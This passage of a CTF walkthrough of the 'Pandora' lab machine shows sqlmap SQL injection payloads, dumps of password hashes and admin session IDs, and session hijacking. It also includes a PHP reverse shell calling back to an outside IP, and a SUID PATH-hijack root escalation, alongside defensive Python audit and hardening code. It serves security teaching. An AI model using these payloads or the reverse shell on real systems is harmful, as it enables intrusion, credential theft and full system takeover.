do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: pandora
Table: tpassword_history
[2 entries]
+---------+---------+---------------------+----------------------------------+---------------------+
| id_pass | id_user | date_end            | password                         | date_begin          |
+---------+---------+---------------------+----------------------------------+---------------------+
| 1       | matt    | 0000-00-00 00:00:00 | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 |
| 2       | daniel  | 0000-00-00 00:00:00 | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 |
+---------+---------+---------------------+----------------------------------+---------------------+

[13:26:19] [INFO] table 'pandora.tpassword_history' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/pandora/tpassword_history.csv'
[13:26:19] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/localhost'

[*] ending @ 13:26:19 /2022-03-30/

Dumping the tsessions_php table:

┌──(kaliaidenpearce369)-[~]
└─$ sqlmap --url="http://localhost:8081/pandora_console/include/chart_generator.php?session_id=''" --dbms=mysql -D pandora -T tsessions_php  --dump    
        ___
       __H__                                                                                                                                                 
 ___ ___[,]_____ ___ ___  {1.6.3#stable}                                                                                                                     
|_ -| . ["]     | .'| . |                                                                                                                                    
|___|_  ["]_|_|_|__,|  _|                                                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:27:32 /2022-03-30/

[13:27:32] [INFO] testing connection to the target URL
[13:27:33] [WARNING] potential permission problems detected ('Access denied')
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=92h891j6qs1...2e4r9vlg39'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: session_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: session_id=-5176' OR 2190=2190#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: session_id=''' OR (SELECT 2464 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2464=2464,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IdPE

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: session_id=''' AND (SELECT 2215 FROM (SELECT(SLEEP(5)))mPZg)-- gdEY
---
[13:27:34] [INFO] testing MySQL
[13:27:34] [INFO] confirming MySQL
[13:27:35] [WARNING] reflective value(s) found and filtering out
[13:27:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: PHP, Apache 2.4.41
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[13:27:35] [INFO] fetching columns for table 'tsessions_php' in database 'pandora'

...

Database: pandora
Table: tsessions_php
[56 entries]
+----------------------------+-----------------------------------------------------+-------------+
| id_session                 | data                                                | last_active |
+----------------------------+-----------------------------------------------------+-------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel";                            | 1638783555  |
| 0ahul7feb1l9db7ffp8d25sjba | NULL                                                | 1638789018  |
| 130or2fa7sjfo5alc260nutu0t | id_usuario|s:6:"daniel";                            | 1648652125  |
| 1cqctk2bd1goq81nog694bmsdg | id_usuario|s:6:"daniel";                            | 1648660609  |
| 1um23if7s531kqf5da14kf5lvm | NULL                                                | 1638792211  |
| 2e25c62vc3odbppmg6pjbf9bum | NULL                                                | 1638786129  |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel";                            | 1638540332  |
| 3me2jjab4atfa5f8106iklh4fc | NULL                                                | 1638795380  |
| 4f51mju7kcuonuqor3876n8o02 | NULL                                                | 1638786842  |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel";                            | 1638535373  |
| 59qae699l0971h13qmbpqahlls | NULL                                                | 1638787305  |
| 5fihkihbip2jioll1a8mcsmp6j | NULL                                                | 1638792685  |
| 5g6l76p4mncnest9ot5hr7opv1 | id_usuario|s:5:"admin";                             | 1648660377  |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel";                            | 1638281946  |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel";                            | 1641195617  |
| 6up1pgja7ic6tti8uoqu641vi3 | NULL                                                | 1648661423  |
| 7cv0ph58mnnfpu45mh9mj3nv0v | NULL                                                | 1648661212  |
| 81f3uet7p3esgiq02d4cjj48rc | NULL                                                | 1623957150  |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel";                            | 1638446321  |
| 8upeameujo9nhki3ps0fu32cgd | NULL                                                | 1638787267  |
| 92h891j6qs18hn1k2e4r9vlg39 | NULL                                                | 1648661546  |
| 9dn1mbgeq1fljfhjsh9sk80asl | NULL                                                | 1648661124  |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel";                            | 1638881787  |
| a3a49kc938u7od6e6mlip1ej80 | NULL                                                | 1638795315  |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel";                            | 1638881664  |
| amn2o2cejcplib5qgjdv8cl2l6 | NULL                                                | 1648659314  |
| cojb6rgubs18ipb35b3f6hf0vp | NULL                                                | 1638787213  |
| d0carbrks2lvmb90ergj7jv6po | NULL                                                | 1638786277  |
| d59vtcusej59n46nn82rnv78n0 | NULL                                                | 1648658750  |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel";                            | 1641200284  |
| fikt9p6i78no7aofn74rr71m85 | NULL                                                | 1638786504  |
| fqd96rcv4ecuqs409n5qsleufi | NULL                                                | 1638786762  |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel";                            | 1638783230  |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349  |
| gf40pukfdinc63nm5lkroidde6 | NULL                                                | 1638786349  |
| heasjj8c48ikjlvsf1uhonfesv | NULL                                                | 1638540345  |
| hhjlv9j3fvb96gurpogjkg10jb | id_usuario|s:5:"admin";                             | 1648660258  |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel";                            | 1638168492  |
| j2bo9tvhgn1e6sb5u03p8101hc | NULL                                                | 1648661270  |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel";                            | 1638456173  |
| koihrjg9bqn35hjos4mdrdmie7 | id_usuario|s:6:"daniel";                            | 1648660800  |
| kp90bu1mlclbaenaljem590ik3 | NULL                                                | 1638787808  |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL                                                | 1638796348  |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel";                            | 1638540482  |
| oc1um2oum4n98a6d7fku241r56 | NULL                                                | 1648660640  |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel";                            | 1637667827  |
| pjigpi88mlmmkllqfqh4ap2kmr | NULL                                                | 1648661225  |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel";                            | 1638168416  |
| q9oqum7kba0n0pip0626gjluea | NULL                                                | 1648659478  |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL                                                | 1638787723  |
| r097jr6k9s7k166vkvaj17na1u | NULL                                                | 1638787677  |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel";                            | 1638889082  |
| tg6ehatvu0t8dps35nod40ph1c | NULL                                                | 1648661158  |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel";                            | 1638547193  |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel";                            | 1638793297  |
| ur7c35ngmoai7gs36odft79f9j | NULL                                                | 1648661348  |
+----------------------------+-----------------------------------------------------+-------------+

[13:29:22] [INFO] table 'pandora.tsessions_php' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/pandora/tsessions_php.csv'
[13:29:22] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/localhost'

[*] ending @ 13:29:22 /2022-03-30/

So we also have session values for the admin user

The other tables look less interesting

Cracking matt's password hash did not work, so it seems we have to move on with the session values

Image

After injecting the admin session value and reloading, the page displays a dashboard

Image

So we have hijacked the admin user's session
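The `data` column above is PHP's default session encoding: `key|<serialize() value>` pairs concatenated, which is why the table alone tells us which session ID belongs to which account. The following Python is an added example, not part of the original writeup or of PandoraFMS: it decodes that format and audits a few rows copied from the dump, listing sessions per user and picking out those bound to a privileged account (the kind of review that would catch stale admin sessions sitting in a table). `SAMPLE_ROWS`, the function names and the `privileged` set are my own constructions.

```python
from datetime import datetime, timezone
from typing import Any, Dict, List, Optional, Tuple

# Constructed sample: a handful of rows copied from the tsessions_php dump,
# as (id_session, data, last_active). sqlmap prints a NULL column as "NULL".
SAMPLE_ROWS: List[Tuple[str, str, int]] = [
    ("09vao3q1dikuoi1vhcvhcjjbc6", 'id_usuario|s:6:"daniel";', 1638783555),
    ("0ahul7feb1l9db7ffp8d25sjba", "NULL", 1638789018),
    ("5g6l76p4mncnest9ot5hr7opv1", 'id_usuario|s:5:"admin";', 1648660377),
    ("g4e01qdgk36mfdh90hvcc54umq", 'id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0;', 1638796349),
    ("hhjlv9j3fvb96gurpogjkg10jb", 'id_usuario|s:5:"admin";', 1648660258),
    ("130or2fa7sjfo5alc260nutu0t", 'id_usuario|s:6:"daniel";', 1648652125),
]


def _parse_value(data: bytes, pos: int) -> Tuple[Any, int]:
    """Parse one PHP serialize() value starting at data[pos]; return (value, next_pos).
    Works on bytes because PHP string lengths count bytes, not characters."""
    tag = data[pos:pos + 1]
    if tag == b"N":                                  # N;
        return None, pos + 2
    if tag in (b"b", b"i", b"d"):                    # b:1;  i:42;  d:1.5;
        end = data.index(b";", pos)
        raw = data[pos + 2:end].decode("ascii")
        convert = {b"b": lambda r: r == "1", b"i": int, b"d": float}[tag]
        return convert(raw), end + 1
    if tag == b"s":                                  # s:<bytelen>:"<bytes>";
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                            # skip ':"'
        end = start + length
        if data[end:end + 2] != b'";':
            raise ValueError(f"bad string terminator at offset {end}")
        return data[start:end].decode("utf-8"), end + 2
    if tag == b"a":                                  # a:<count>:{<key><value>...}
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                              # skip ':{'
        items: Dict[Any, Any] = {}
        for _ in range(count):
            key, pos = _parse_value(data, pos)
            items[key], pos = _parse_value(data, pos)
        if data[pos:pos + 1] != b"}":
            raise ValueError(f"bad array terminator at offset {pos}")
        return items, pos + 1
    raise ValueError(f"unsupported serialize() tag {tag!r} at offset {pos}")


def parse_php_session(raw: Optional[str]) -> Dict[str, Any]:
    """Decode PHP's default session_encode() output: key|<serialized value>, repeated."""
    if raw is None or raw == "NULL":                 # unauthenticated / empty session
        return {}
    data = raw.encode("utf-8")
    pos, session = 0, {}
    while pos < len(data):
        bar = data.index(b"|", pos)
        key = data[pos:bar].decode("utf-8")
        session[key], pos = _parse_value(data, bar + 1)
    return session


def format_epoch(ts: int) -> str:
    """last_active is a Unix timestamp; render it as UTC ISO-8601 for the report."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()


def sessions_by_user(rows: List[Tuple[str, str, int]]) -> Dict[str, List[Tuple[str, int]]]:
    """Group live sessions by the account they are bound to (id_usuario)."""
    users: Dict[str, List[Tuple[str, int]]] = {}
    for sid, data, last_active in rows:
        user = parse_php_session(data).get("id_usuario")
        if user:
            users.setdefault(user, []).append((sid, int(last_active)))
    return users


def privileged_sessions(rows, privileged=frozenset({"admin"})) -> List[Tuple[str, str, str]]:
    """Sessions bound to a privileged account: the rows an attacker who can read this
    table would replay, and the ones an admin should expire first. The `privileged`
    set is an assumption for this example."""
    found = []
    for sid, data, last_active in rows:
        user = parse_php_session(data).get("id_usuario")
        if user in privileged:
            found.append((sid, user, format_epoch(int(last_active))))
    return found


if __name__ == "__main__":
    for user, sessions in sessions_by_user(SAMPLE_ROWS).items():
        print(f"{user}: {len(sessions)} session(s)")
    for sid, user, seen in privileged_sessions(SAMPLE_ROWS):
        print(f"privileged session {sid} ({user}) last active {seen}")
```

The parser covers the scalar and array types that appear in such tables; anything else raises rather than silently misreading the row, which matters when the output feeds an audit.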

Since we can access Admin Tools in the dashboard, we can get RCE by uploading a PHP reverse shell as a zip, as shown in this exploit video

Using the pentestmonkey PHP reverse shell,

┌──(kaliaidenpearce369)-[~]
└─$ head shell.php         
<?php

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.5';  // CHANGE THIS
$port = 9876;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
                                                                                                                                                             
┌──(kaliaidenpearce369)-[~]
└─$ zip shell.zip shell.php 
  adding: shell.php (deflated 60%)

After uploading this zip, load the file manager page to execute the shell

┌──(kaliaidenpearce369)-[~]
└─$ nc -nlvp 9876                   
listening on [any] 9876 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.11.136] 59936
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 17:51:13 up  2:56,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
daniel   pts/0    10.10.14.5       16:16   12:56   0.18s  0.18s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off                                     
$whoami                                                
matt 
$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
$ cd /home/matt
$ cat user.txt
<USER FLAG>

Escalating Privileges To Root

Listing the SUID binaries,

$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1

It's time to exploit /usr/bin/pandora_backup

Upgrading to an interactive shell,

$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
matt@pandora:/home/matt$ ls
ls
user.txt

Copying the SUID binary to the local machine,

matt@pandora:/home/matt$ cp /usr/bin/pandora_backup .
cp /usr/bin/pandora_backup .
matt@pandora:/home/matt$ ls
ls
pandora_backup  user.txt
matt@pandora:/home/matt$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.14.5 - - [30/Mar/2022 17:58:54] "GET /pandora_backup HTTP/1.1" 200 -

Running strings on the binary shows what it does

┌──(kaliaidenpearce369)-[~]
└─$ strings pandora_backup                                                                                            

...

u/UH
[]A\A]A^A_
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*
Backup failed!
Check your permissions!
Backup successful!
Terminating program!
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c

...

In order to exploit this we need a shell without the restrictions of the one spawned by the web server; for that we can use the /usr/bin/at SUID binary from the list above. From the current shell, /tmp appears empty:

matt@pandora:/$ ls /tmp
ls /tmp
matt@pandora:/$ 

Spawning a new shell through at,

    echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null

matt@pandora:/$ echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
warning: commands will be executed using /bin/sh
job 2 at Wed Mar 30 18:23:00 2022
/bin/sh: 0: can't access tty; job control turned off
$ $ ls /tmp
ls /tmp
systemd-private-4b7bb41d4d684fdcb8f054e8d71db052-apache2.service-g5jfnj
systemd-private-4b7bb41d4d684fdcb8f054e8d71db052-systemd-logind.service-r0r3ug
systemd-private-4b7bb41d4d684fdcb8f054e8d71db052-systemd-resolved.service-dpsyag
systemd-private-4b7bb41d4d684fdcb8f054e8d71db052-systemd-timesyncd.service-6opwTh
tmux-1001
vmware-root_697-3988163015

Now we can confirm that we have an unrestricted shell: the real contents of /tmp are visible
We can easily exploit this SUID binary to drop a root shell, because the tar command it runs is not invoked with an absolute path, so it is resolved through our $PATH

Now we craft a malicious tar and abuse the $PATH variable,

$ cd /tmp
cd /tmp
$ echo "/bin/sh -p" >tar
echo "/bin/sh -p" >tar
$ chmod +x tar
chmod +x tar
$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
$ /usr/bin/pandora_backup
/usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
/bin/sh: 0: can't access tty; job control turned off
# id
id
uid=0(root) gid=1000(matt) groups=1000(matt)
# whoami
whoami
root
# cat /root/root.txt
cat /root/root.txt
<ROOT FLAG>
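The root cause of this privilege escalation is that the SUID helper shells out to a bare `tar` and trusts whatever PATH the caller supplies. The following Python is an added example, not the box's binary or PandoraFMS code: it reproduces the resolution with two constructed stub `tar` scripts (one in an "attacker-writable" directory placed first in PATH, one in a "trusted" directory), shows the hardened pattern a SUID helper should use (absolute program path, argv list instead of a shell string, fixed environment), and includes a check a defender can run over a PATH string to flag writable directories. All directories, stub contents and the trusted PATH value are constructed for the demo.

```python
import os
import shutil
import subprocess
import tempfile
from typing import Dict, List, Optional


def make_stub_tar(directory: str, marker: str) -> str:
    """Constructed stand-in for a tar binary: it only prints `marker`, so the
    output tells us which 'tar' a command actually ran."""
    path = os.path.join(directory, "tar")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("#!/bin/sh\necho %s\n" % marker)
    os.chmod(path, 0o755)
    return path


def resolve_like_system(command: str, path_env: str) -> Optional[str]:
    """What system("tar ...") ends up running: the shell walks PATH left to
    right and takes the first executable file named `command`."""
    return shutil.which(command, path=path_env)


def writable_path_dirs(path_env: str) -> List[str]:
    """Defender's check: PATH entries the current user can write to. A SUID
    program that resolves commands through such a PATH can be redirected by
    anyone able to create a file in one of them."""
    flagged = []
    for entry in path_env.split(os.pathsep):
        entry = entry or "."  # an empty PATH element means the current directory
        if os.path.isdir(entry) and os.access(entry, os.W_OK):
            flagged.append(entry)
    return flagged


def run_backup_vulnerable(path_env: str) -> str:
    """Mirrors the pattern in the box's binary: a shell command line with a bare
    'tar', resolved through whatever PATH the caller supplies. The tar arguments
    are placeholders; the stubs ignore them."""
    proc = subprocess.run(
        "tar -czf /dev/null /dev/null",
        shell=True,
        env={"PATH": path_env},
        capture_output=True,
        text=True,
        check=False,
    )
    return proc.stdout.strip()


def run_backup_hardened(tar_path: str) -> str:
    """Hardened form: absolute program path, argv list instead of a shell string,
    and a fixed environment. The caller's PATH is never consulted, so planting a
    'tar' in a writable directory changes nothing."""
    argv = [tar_path, "-czf", "/dev/null", "-C", "/dev", "null"]
    env = {"PATH": "/usr/bin:/bin"}  # constructed trusted value, not inherited
    proc = subprocess.run(argv, env=env, capture_output=True, text=True, check=False)
    return proc.stdout.strip()


def demo() -> Dict[str, object]:
    """Put a writable directory ahead of the trusted one, the same shape as
    `export PATH=/tmp:$PATH`, and compare both implementations."""
    with tempfile.TemporaryDirectory() as attacker_dir, tempfile.TemporaryDirectory() as trusted_dir:
        attacker_tar = make_stub_tar(attacker_dir, "ATTACKER")
        trusted_tar = make_stub_tar(trusted_dir, "TRUSTED")
        hostile_path = os.pathsep.join([attacker_dir, trusted_dir])
        return {
            "resolves_to_attacker_stub": resolve_like_system("tar", hostile_path) == attacker_tar,
            "vulnerable_output": run_backup_vulnerable(hostile_path),
            "hardened_output": run_backup_hardened(trusted_tar),
            "writable_dirs_flagged": writable_path_dirs(hostile_path) == [attacker_dir, trusted_dir],
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In C the same fix is an `execve()` of `/usr/bin/tar` with a fixed `envp` instead of `system("tar ...")`; since the glob in the original command needs a shell, the hardened form passes the directory to archive as an argument instead. Note also that the shell obtained above reports `uid=0(root) gid=1000(matt)`, so the helper never adjusted its group either.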